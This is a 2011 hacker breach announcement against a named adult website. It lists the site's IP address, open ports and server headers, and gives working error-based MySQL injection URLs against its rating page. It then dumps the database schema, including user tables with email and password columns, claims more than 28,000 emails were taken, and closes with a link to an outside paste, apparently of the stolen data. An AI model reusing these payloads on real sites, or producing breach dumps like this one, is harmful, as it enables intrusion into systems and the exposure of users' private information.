******************************************************************
(+) Authors : TinKode, denjacker, tdxev
(+) WebSite : twitter.com/TinKode
(+) Date : 12.06.2011
(+) Hour : 27:27 PM
(+) Target : Pron.com (Porn)
(+) Document: PwN-Da-Bitch
(+) Method : MySQL Injection Error Based
******************************************************************
[+] URL : http://www.pron.com/rate.php?id=31337
[+] IP Address : 99.192.153.113 UNITED STATES - MICHIGAN ( FRANKLIN )
[+] NEIGHBOR SITES : pron.com ; wankz.com
[+] OPENED PORTS
53 TCP - dnsmasq 2.45
80 TCP - Apache http 2.0.59 UNIX
110 TCP - pop3 Dovecot pop3d
993 TCP - imap Dovecot imapd
[+] HEADERS
Date : Sun, 12 Jun 2011 14:14:22 GMT
Server : Apache/2.0.59 (Unix) PHP/5.3.3
X-Powered-By : PHP/5.3.3
Expires : Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control : no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma : no-cache
Vary : Accept-Encoding
Content-Encoding : gzip
Content-Length : 10143
Keep-Alive : timeout=15, max=100
Connection : Keep-Alive
Content-Type : text/html
[+] MySQL Injection syntax : http://www.pron.com/rate.php?id=31337'+and+1=2+UNION+ALL+SELECT+1,2,3--+
http://www.pron.com/rate.php?id=31337'+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
[+] DB VERSION : 5.0.77-log
[+] SYSTEM USER : pr0ntube@localhost
[+] HOSTNAME : cs646.mojohost.com
[+] OS : redhat-linux-gnu
[+] MACHINE : x86_641
[+] CURRENT DB : pron
[+] OTHER DB's : information_schema, pr0ntube, test
DATABASE : pron
--------------------------------------------------------------------------------------------------------------------------
TABLES COLUMNS
xml_feeds = record_num url name
users = record_num banner backlink is_premium verify validate lastlogin country enabled freeform program_url program_name im_type im phone name description date_joined gender age location avatar user_level last_ip email password username
subscriptions = friend user
status = encoder_total encoder_done encoder_running scraper_running
scraper_import = record_num paysite user url
reported_content = record_num reason ip content
reported_comments = ip record_num comment
ratings = used_ips total_value total_votes id
profile_comments = record_num ip timestamp profile comment name userid
paysites = record_num belowplayertext enabled postroll ad9 ad8 ad7 ad6 ad5 ad4 ad3 ad2 ad1 ad0 user url name
niches = record_num enabled url postroll ad9 ad8 ad7 ad6 ad5 ad4 ad3 ad2 ad1 ad0 name
mail = display_a display trash_a trash read text date subject to from id
keywords = amount word
favorites = record_num content user
csv_import = record_num submitter hotlink default_paysite paysite lengthsec keywords embed desc thumb flv title
countries = value id
content_views = content views
content_niches = niche content
content record_num = is_premium mobile photos xml main_thumb enabled hotlinked approved ip submitter length rating encoded_date date_added scheduled_date pornstars keywords paysite description embed thumbnail orig_filename filename title
comments = record_num ip timestamp content comment name userid
DATABASE : information_schema
--------------------------------------------------------------------------------------------------------------------------
TABLES COLUMNS
VIEWS = SECURITY_TYPE DEFINER IS_UPDATABLE CHECK_OPTION VIEW_DEFINITION TABLE_NAME TABLE_SCHEMA TABLE_CATALOG
USER_PRIVILEGES = IS_GRANTABLE PRIVILEGE_TYPE TABLE_CATALOG GRANTEE
TRIGGERS DEFINER = SQL_MODE CREATED ACTION_REFERENCE_NEW_ROW ACTION_REFERENCE_OLD_ROW ACTION_REFERENCE_NEW_TABLE ACTION_REFERENCE_OLD_TABLE ACTION_TIMING ACTION_ORIENTATION ACTION_STATEMENT ACTION_CONDITION ACTION_ORDER EVENT_OBJECT_TABLE EVENT_OBJECT_SCHEMA EVENT_OBJECT_CATALOG EVENT_MANIPULATION TRIGGER_NAME TRIGGER_SCHEMA TRIGGER_CATALOG
TABLE_PRIVILEGES = IS_GRANTABLE PRIVILEGE_TYPE TABLE_NAME TABLE_SCHEMA TABLE_CATALOG GRANTEE
TABLE_CONSTRAINTS = CONSTRAINT_TYPE TABLE_NAME TABLE_SCHEMA CONSTRAINT_NAME CONSTRAINT_SCHEMA CONSTRAINT_CATALOG
TABLES = TABLE_COMMENT CREATE_OPTIONS CHECKSUM TABLE_COLLATION CHECK_TIME UPDATE_TIME CREATE_TIME AUTO_INCREMENT DATA_FREE INDEX_LENGTH MAX_DATA_LENGTH DATA_LENGTH AVG_ROW_LENGTH TABLE_ROWS ROW_FORMAT VERSION ENGINE TABLE_TYPE TABLE_NAME TABLE_SCHEMA TABLE_CATALOG
STATISTICS = COMMENT INDEX_TYPE NULLABLE PACKED SUB_PART CARDINALITY COLLATION COLUMN_NAME SEQ_IN_INDEX INDEX_NAME INDEX_SCHEMA NON_UNIQUE TABLE_NAME TABLE_SCHEMA TABLE_CATALOG
SCHEMA_PRIVILEGES = IS_GRANTABLE PRIVILEGE_TYPE TABLE_SCHEMA TABLE_CATALOG GRANTEE
SCHEMATA = SQL_PATH DEFAULT_COLLATION_NAME DEFAULT_CHARACTER_SET_NAME SCHEMA_NAME CATALOG_NAME
ROUTINES = DEFINER ROUTINE_COMMENT SQL_MODE LAST_ALTERED CREATED SECURITY_TYPE SQL_PATH SQL_DATA_ACCESS IS_DETERMINISTIC PARAMETER_STYLE EXTERNAL_LANGUAGE EXTERNAL_NAME ROUTINE_DEFINITION ROUTINE_BODY DTD_IDENTIFIER ROUTINE_TYPE ROUTINE_NAME ROUTINE_SCHEMA ROUTINE_CATALOG SPECIFIC_NAME
PROFILING = SOURCE_LINE SOURCE_FILE SOURCE_FUNCTION SWAPS PAGE_FAULTS_MINOR PAGE_FAULTS_MAJOR MESSAGES_RECEIVED MESSAGES_SENT BLOCK_OPS_OUT BLOCK_OPS_IN CONTEXT_INVOLUNTARY CONTEXT_VOLUNTARY CPU_SYSTEM CPU_USER DURATION STATE SEQ QUERY_ID
KEY_COLUMN_USAGE = REFERENCED_COLUMN_NAME REFERENCED_TABLE_NAME REFERENCED_TABLE_SCHEMA POSITION_IN_UNIQUE_CONSTRAINT ORDINAL_POSITION COLUMN_NAME TABLE_NAME TABLE_SCHEMA TABLE_CATALOG CONSTRAINT_NAME CONSTRAINT_SCHEMA CONSTRAINT_CATALOG
COLUMN_PRIVILEGES = IS_GRANTABLE PRIVILEGE_TYPE COLUMN_NAME TABLE_NAME TABLE_SCHEMA TABLE_CATALOG GRANTEE
COLUMNS = COLUMN_COMMENT PRIVILEGES EXTRA COLUMN_KEY COLUMN_TYPE COLLATION_NAME CHARACTER_SET_NAME NUMERIC_SCALE NUMERIC_PRECISION CHARACTER_OCTET_LENGTH CHARACTER_MAXIMUM_LENGTH DATA_TYPE IS_NULLABLE COLUMN_DEFAULT ORDINAL_POSITION COLUMN_NAME TABLE_NAME TABLE_SCHEMA TABLE_CATALOG
COLLATION_CHARACTER_SET_APPLICABILITY = CHARACTER_SET_NAME COLLATION_NAME
COLLATIONS = SORTLEN IS_COMPILED IS_DEFAULT ID CHARACTER_SET_NAME COLLATION_NAME
CHARACTER_SETS = MAXLEN DESCRIPTION DEFAULT_COLLATE_NAME CHARACTER_SET_NAME
DATABASE : pr0ntube
--------------------------------------------------------------------------------------------------------------------------
TABLES COLUMNS
users = record_num is_premium verify lastlogin country enabled freeform program_url program_name im_type im phone name description date_joined gender age location avatar user_level last_ip email password username
subscriptions = friend user
reported_content = record_num reason ip content
reported_comments = ip record_num comment
ratings = used_ips total_value total_votes id
profile_comments = record_num ip timestamp profile comment name userid
paysites = record_num belowplayertext enabled postroll ad9 ad8 ad7 ad6 ad5 ad4 ad3 ad2 ad1 ad0 user url name
niches = record_num enabled url postroll ad9 ad8 ad7 ad6 ad5 ad4 ad3 ad2 ad1 ad0 name
mail = display_a display trash_a trash read text date subject to from id
friend_email_list = verified video_id member_id email
favorites = record_num content user
encoding_queue = record_num executed timestamp id
countries = value id
content_views = content views
content_niches = niche content
content_ads = link_url ad_banner ad_text ad_type record_num
content = record_num is_premium enabled mainthumb hotlinked approved ip submitter length rating encoded_date date_added scheduled_date pornstars keywords paysite description thumbnail orig_filename filename title
comments = record_num ip timestamp content comment name userid
Number of emails: 28 000 +
http://d0mhc.ath.cx/~uck/duck/?id=SkcQqtKC